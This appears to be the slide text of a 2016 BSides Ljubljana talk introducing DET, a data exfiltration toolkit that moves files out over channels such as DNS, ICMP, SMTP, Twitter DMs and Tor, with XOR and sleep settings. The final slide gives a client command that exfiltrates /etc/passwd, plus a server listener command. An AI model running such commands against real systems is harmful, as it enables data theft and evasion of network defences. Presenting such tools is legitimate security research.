Introducing DET
(Data Exfiltration Toolkit)
Paul Amar - BSides Ljubljana - 09/03/2016
General Approach
TCP, DNS, HTTP, ICMP, SMTP
HammerToss (July 2015)
What’s available today?
And many more... created almost every day.
Not kidding.
Current state
TCP, DNS, HTTP, ICMP, Twitter DMs, SMTP (e.g. Gmail)
Introducing DET
Configuration file (JSON format)
File to exfiltrate
Folder to exfiltrate / multi-threaded
Plugin(s) to use
Plugin(s) to exclude
Server mode
Configuration file
List all your plugins and their configuration
Configuration file
Each plugin has its own configuration (username, pwd, …)
Configuration file
Additional configuration (XOR Key, Sleeping time, …)
Let’s dig a bit (Client-side)
“Registration” phase 1/2
“Registration” phase 2/2
Sending the data 1/2
Sending the data 2/2
“End” phase 1/2
“End” phase 2/2
So, in a few words...
But wait! There’s moar.
Additional plugins (Tor Integration) 1/2
Additional plugins (Tor Integration) 2/2
“Experimental” plugins
What’s next
Installation
Get/install it:
Client side:
- python det.py -f /etc/passwd -c ./config.json (or PS scripts)
Server side:
- python det.py -L -c ./config.json
sys.exit(0)